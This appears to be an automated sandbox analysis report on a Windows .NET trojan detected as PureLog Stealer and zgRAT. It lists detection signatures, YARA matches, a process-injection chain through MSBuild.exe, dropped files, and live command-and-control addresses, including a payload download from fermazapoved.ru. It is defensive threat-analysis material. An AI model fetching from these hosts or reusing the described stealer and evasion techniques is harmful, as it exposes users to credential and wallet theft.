Windows Analysis Report
x7myVfh5YS.exe

Overview

General Information

Sample name:x7myVfh5YS.exe
renamed because original name is a hash value
Original sample name:1de4c3cc42232c1e3d7c09404f57b450.exe
Analysis ID:1487768
MD5:1de4c3cc42232c1e3d7c09404f57b450
SHA1:28adaa72fe927ade1b3e073de288e1b6f294d346
SHA256:131e2baac32f898ab2d7da10d8c79f546977bc1d1d585ba687387101610ed3b9
Tags:32, exe, trojan
Infos:

Detection

PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to capture screen (.Net source)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • x7myVfh5YS.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\x7myVfh5YS.exe" MD5: 1DE4C3CC42232C1E3D7C09404F57B450)
    • conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 4256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • Qqgmpuehc.exe (PID: 4220 cmdline: "C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe" MD5: 47DA4EB71A23802DAB374E272EAD2F78)
        • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSBuild.exe (PID: 1848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2353903041.0000000005C60000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
  • 0x3d14e:$s1: file:///
  • 0x3d05c:$s2: {11111-22222-10009-11112}
  • 0x3d0de:$s3: {11111-22222-50001-00000}
  • 0x3b325:$s4: get_Module
  • 0x3b63f:$s5: Reverse
  • 0x36352:$s6: BlockCopy
  • 0x3632c:$s7: ReadByte
  • 0x3d160:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000003.00000002.2352224373.00000000059A0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
Source | Rule | Description | Author | Strings
3.2.MSBuild.exe.5c60000.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
3.2.MSBuild.exe.59a0000.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
3.2.MSBuild.exe.6440000.5.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
3.2.MSBuild.exe.6440000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.MSBuild.exe.6440000.5.raw.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
  • 0x3d14e:$s1: file:///
  • 0x3d05c:$s2: {11111-22222-10009-11112}
  • 0x3d0de:$s3: {11111-22222-50001-00000}
  • 0x3b325:$s4: get_Module
  • 0x3b63f:$s5: Reverse
  • 0x36352:$s6: BlockCopy
  • 0x3632c:$s7: ReadByte
  • 0x3d160:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

                  System Summary

                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 62.173.145.78, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4256, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706
                  No Snort rule has matched
                  Timestamp:2024-08-05T05:54:16.947098+0200
                  SID:2019714
                  Source Port:49708
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-05T05:54:15.646834+0200
                  SID:2019714
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic

                  AV Detection

                  Source: C:\Users\user\AppData\Roaming\d3d9.dll, Avira: detection malicious, Label: HEUR/AGEN.1300671
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe, ReversingLabs: Detection: 24%
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe, Virustotal: Detection: 41%
                  Source: C:\Users\user\AppData\Roaming\d3d9.dll, ReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Roaming\d3d9.dll, Virustotal: Detection: 60%
                  Source: x7myVfh5YS.exe, Virustotal: Detection: 28%
                  Source: x7myVfh5YS.exe, ReversingLabs: Detection: 28%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\d3d9.dll, Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe, Joe Sandbox ML: detected
                  Source: x7myVfh5YS.exe, Joe Sandbox ML: detected
                  Source: x7myVfh5YS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 62.173.145.78:443 -> 192.168.2.5:49708 version: TLS 1.2
                  Source: x7myVfh5YS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: costura.dotnetzip.pdb.compressed source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: $jq costura.dotnetzip.pdb.compressedlBjq source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: $jq costura.dotnetzip.pdb.compressed source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: MSBuild.exe, 00000003.00000002.2357846379.00000000068C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEECF58 FindFirstFileExW,0_2_6CEECF58
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4BB6C8 FindFirstFileExW,5_2_6C4BB6C8
                  Source: global trafficTCP traffic: 192.168.2.5:49704 -> 188.130.138.23:7702
                  Source: global trafficTCP traffic: 192.168.2.5:54809 -> 91.217.76.162:56004
                  Source: global trafficTCP traffic: 192.168.2.5:54808 -> 1.1.1.1:53
                  Source: global trafficHTTP traffic detected: GET /images/h.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                  Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: global trafficDNS traffic detected: DNS query: 35.37.15.0.in-addr.arpa
                  Source: global trafficDNS traffic detected: DNS query: fermazapoved.ru
                  Source: global trafficDNS traffic detected: DNS query: access.samp-global.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, hu5jtJKG1agB7FrDKI3.cs.Net Code: z2TKaC5YIM
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Window created: window name: CLIPBRDWNDCLASS

                  System Summary

                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.x7myVfh5YS.exe.6cefb000.2.raw.unpack, Program.csLarge array initialization: MemoryStream: array initializer size 843088
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CED8A50 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6CED8A50
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4A85F0 GetModuleHandleW,NtQueryInformationProcess,5_2_6C4A85F0
                  Source: x7myVfh5YS.exe, 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameQijihslqi.exe" vs x7myVfh5YS.exe
                  Source: x7myVfh5YS.exe, 00000000.00000002.2017995556.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs x7myVfh5YS.exe
                  Source: x7myVfh5YS.exe, 00000000.00000000.2013853638.0000000000BC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJessica435Kevin.pdf\ vs x7myVfh5YS.exe
                  Source: x7myVfh5YS.exeBinary or memory string: OriginalFilenameJessica435Kevin.pdf\ vs x7myVfh5YS.exe
                  Source: x7myVfh5YS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: x7myVfh5YS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.x7myVfh5YS.exe.6cefb000.2.raw.unpack, Program.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, GaM8BJiPLPU7o8wNO7B.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, rKp2YfihSiQO2BWnfRg.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, rKp2YfihSiQO2BWnfRg.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.MSBuild.exe.68c0000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformBlock'
                  Source: 3.2.MSBuild.exe.68c0000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.MSBuild.exe.68c0000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/24@3/3
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeFile created: C:\Users\user\AppData\Roaming\d3d9.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\c8f0949f2f3d443d
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1124:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\d70b9a61f2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\Dmhie.tmpdbJump to behavior
                  Source: x7myVfh5YS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Fsgbbtx.tmpdb.3.dr, Hwfklpinvb.tmpdb.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: x7myVfh5YS.exeVirustotal: Detection: 28%
                  Source: x7myVfh5YS.exeReversingLabs: Detection: 28%
                  Source: unknownProcess created: C:\Users\user\Desktop\x7myVfh5YS.exe "C:\Users\user\Desktop\x7myVfh5YS.exe"
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe "C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe "C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
